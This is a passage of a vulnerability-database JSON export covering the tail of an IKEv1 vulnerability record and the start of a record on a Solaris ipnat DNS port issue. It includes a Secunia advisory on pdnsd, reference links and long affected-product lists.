            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20051114-ipsec.shtml"
          },
          {
            "title": "HPSBUX02076",
            "trust": 0.8,
            "url": "http://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c00555601"
          },
          {
            "title": "HPSBUX02076",
            "trust": 0.8,
            "url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/HP-UX/HPSBUX02076.html"
          },
          {
            "title": "PSN-2005-11-007",
            "trust": 0.8,
            "url": "http://www.juniper.net/support/security/alerts/PSN-2005-11-007.txt"
          },
          {
            "title": "AXSA-2006-65:1",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=362"
          },
          {
            "title": "RHSA-2006:0267",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2006-0267.html"
          },
          {
            "title": "102246",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102246-1"
          },
          {
            "title": "102246",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102246-3"
          },
          {
            "title": "SYM05-025",
            "trust": 0.8,
            "url": "http://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html"
          },
          {
            "title": "cisco-sa-20051114-ipsec",
            "trust": 0.8,
            "url": "http://www.cisco.com/japanese/warp/public/3/jp/service/tac/707/cisco-sa-20051114-ipsec-j.shtml"
          },
          {
            "title": "SYM05-025",
            "trust": 0.8,
            "url": "http://www.symantec.com/region/jp/avcenter/security/content/2005.11.21.html"
          },
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.checkpoint.co.jp/"
          },
          {
            "title": "RHSA-2006:0267",
            "trust": 0.8,
            "url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2006-0267J.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000683"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "NVD-CWE-Other",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2005-3673"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.3,
            "url": "http://jvn.jp/niscc/niscc-273756/index.html"
          },
          {
            "trust": 2.5,
            "url": "http://www.niscc.gov.uk/niscc/docs/re-20051114-01014.pdf?lang=en"
          },
          {
            "trust": 2.5,
            "url": "http://www.securityfocus.com/bid/15479"
          },
          {
            "trust": 2.5,
            "url": "http://www.kb.cert.org/vuls/id/226364"
          },
          {
            "trust": 1.7,
            "url": "http://secureknowledge.us.checkpoint.com/secureknowledge/viewsolutiondocument.do?id=sk31316"
          },
          {
            "trust": 1.7,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp/"
          },
          {
            "trust": 1.7,
            "url": "http://securitytracker.com/id?1015235"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/17621"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/17621/"
          },
          {
            "trust": 1.4,
            "url": "http://www.frsirt.com/english/advisories/2005/2470"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2005/2470"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17553/"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/17668/"
          },
          {
            "trust": 0.8,
            "url": "http://www.ee.oulu.fi/research/ouspg/protos/testing/c09/isakmp"
          },
          {
            "trust": 0.8,
            "url": "http://www.ficora.fi/suomi/tietoturva/varoitukset/varoitus-2005-82.htm"
          },
          {
            "trust": 0.8,
            "url": "http://www.auscert.org.au/5748"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17608/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17684/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17663/"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17838/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-3673"
          },
          {
            "trust": 0.8,
            "url": "http://www.cpni.gov.uk/products/vulnerabilitydisclosures/default.aspx?id=va-20051114-01014.xml"
          },
          {
            "trust": 0.8,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-3673"
          },
          {
            "trust": 0.8,
            "url": "http://www.cpni.gov.uk/docs/re-20051114-01014.pdf?lang=en"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/17902"
          },
          {
            "trust": 0.8,
            "url": "http://www.cyberpolice.go.jp/important/2005/20051118_193244.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.checkpoint.com/techsupport/"
          },
          {
            "trust": 0.3,
            "url": "http://www.checkpoint.com/downloads/latest/hfa.html"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/3352/"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/project/showfiles.php?group_id=74601\u0026package_id=74949\u0026release_id=372605"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/mailarchive/forum.php?thread_id=9017454\u0026forum_id=32000"
          },
          {
            "trust": 0.1,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=372605\u0026group_id=74601"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/about_secunia_advisories/"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          },
          {
            "db": "VULHUB",
            "id": "VHN-14881"
          },
          {
            "db": "BID",
            "id": "15479"
          },
          {
            "db": "PACKETSTORM",
            "id": "41739"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-264"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000683"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3673"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-14881",
            "ident": null
          },
          {
            "db": "BID",
            "id": "15479",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "41739",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-264",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000683",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2005-3673",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2005-11-17T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "date": "2005-11-18T00:00:00",
            "db": "VULHUB",
            "id": "VHN-14881",
            "ident": null
          },
          {
            "date": "2005-11-17T00:00:00",
            "db": "BID",
            "id": "15479",
            "ident": null
          },
          {
            "date": "2005-11-22T18:19:46",
            "db": "PACKETSTORM",
            "id": "41739",
            "ident": null
          },
          {
            "date": "2005-11-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200511-264",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2005-000683",
            "ident": null
          },
          {
            "date": "2005-11-18T21:03:00",
            "db": "NVD",
            "id": "CVE-2005-3673",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2006-01-03T00:00:00",
            "db": "CERT/CC",
            "id": "VU#226364",
            "ident": null
          },
          {
            "date": "2011-03-08T00:00:00",
            "db": "VULHUB",
            "id": "VHN-14881",
            "ident": null
          },
          {
            "date": "2005-11-17T00:00:00",
            "db": "BID",
            "id": "15479",
            "ident": null
          },
          {
            "date": "2006-09-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200511-264",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2005-000683",
            "ident": null
          },
          {
            "date": "2025-04-03T01:03:51.193000",
            "db": "NVD",
            "id": "CVE-2005-3673",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-264"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Multiple vulnerabilities in Internet Key Exchange (IKE) version 1 implementations",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#226364"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200511-264"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200807-0659

    Vulnerability from variot - Updated: 2026-03-09 21:24

    ipnat in IP Filter in Sun Solaris 10 and OpenSolaris before snv_96, when running on a DNS server with Network Address Translation (NAT) configured, improperly changes the source port of a packet when the destination port is the DNS port, which allows remote attackers to bypass an intended CVE-2008-1447 protection mechanism and spoof the responses to DNS queries sent by named. Deficiencies in the DNS protocol and common DNS implementations facilitate DNS cache poisoning attacks. Multiple vendors' implementations of the DNS protocol are prone to a DNS-spoofing vulnerability because the software fails to securely implement random values when performing DNS queries. Successfully exploiting this issue allows remote attackers to spoof DNS replies, allowing them to redirect network traffic and to launch man-in-the-middle attacks. This issue affects Microsoft Windows DNS Clients and Servers, ISC BIND 8 and 9, and multiple Cisco IOS releases; other DNS implementations may also be vulnerable. ----------------------------------------------------------------------

    Do you need accurate and reliable IDS / IPS / AV detection rules?

    Get in-depth vulnerability details: http://secunia.com/binary_analysis/sample_analysis/


    TITLE: pdnsd DNS Cache Poisoning and Denial of Service

    SECUNIA ADVISORY ID: SA31847

    VERIFY ADVISORY: http://secunia.com/advisories/31847/

    CRITICAL: Moderately critical

    IMPACT: DoS

    WHERE:

    From remote

    SOFTWARE: pdnsd 1.x http://secunia.com/advisories/product/9584/

    DESCRIPTION: Some vulnerabilities have been reported in pdnsd, which can be exploited by malicious people to poison the DNS cache and cause a DoS (Denial of Service).

    1) A vulnerability is caused due to pdnsd not sufficiently randomising the query port number, which can be exploited to poison the DNS cache.

    2) An error exists within the "p_exec_query()" function in src/dns_query.c when processing long replies with many answer sections. This can be exploited to e.g. crash the service by sending a specially crafted reply.

    The vulnerabilities are reported in versions prior to version 1.2.7-par.

    SOLUTION: Update to version 1.2.7-par.

    PROVIDED AND/OR DISCOVERED BY: 1) Dan Kaminsky, IOActive. 2) Reported by the vendor.

    ORIGINAL ADVISORY: http://www.phys.uu.nl/~rombouts/pdnsd/ChangeLog

    OTHER REFERENCES: US-CERT VU#800113: http://www.kb.cert.org/vuls/id/800113


    About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

    Subscribe: http://secunia.com/advisories/secunia_security_advisories/

    Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

    Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


    Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sun",
            "version": "snv_58"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sun",
            "version": "snv_48"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sun",
            "version": "snv_60"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sun",
            "version": "snv_92"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sun",
            "version": "snv_47"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sun",
            "version": "snv_61"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sun",
            "version": "snv_59"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "sun",
            "version": "snv_94"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_25"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_72"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_09"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_46"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_29"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_83"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_70"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_75"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_15"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_78"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_21"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_66"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_20"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_63"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_11"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_52"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_24"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "10"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_35"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_76"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_07"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_69"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_74"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_14"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_16"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_01"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_12"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_18"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_33"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_71"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_44"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_81"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_67"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_31"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_64"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_84"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_17"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_62"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_77"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_91"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_93"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_86"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_36"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_04"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_41"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_13"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_39"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_37"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_32"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_05"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_38"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_89"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_57"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_22"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_56"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_65"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_88"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_02"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_54"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_68"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_53"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_23"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_85"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_87"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_03"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_28"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_06"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_40"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_73"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_30"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_79"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_27"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_45"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_26"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_95"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_42"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_10"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_19"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_82"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_90"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_80"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_55"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_43"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_50"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_08"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_49"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_34"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "sun",
            "version": "snv_51"
          },
          {
            "_id": null,
            "model": "ios 12.4",
            "scope": "ne",
            "trust": 0.9,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "alcatel lucent",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple computer",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "blue coat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "bluecat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "f5",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "force10",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "fujitsu",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "funkwerk",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "infoblox",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "internet consortium",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mandriva",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nixu",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nominum",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "novell",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openbsd",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openwall gnu linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "qnx",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "red hat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "suse linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "secure computing network security division",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "slackware linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "wind river",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "dnsmasq",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "(sparc)"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "(x86)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "_id": null,
            "model": "netware sp1.1",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "novell",
            "version": "6.5"
          },
          {
            "_id": null,
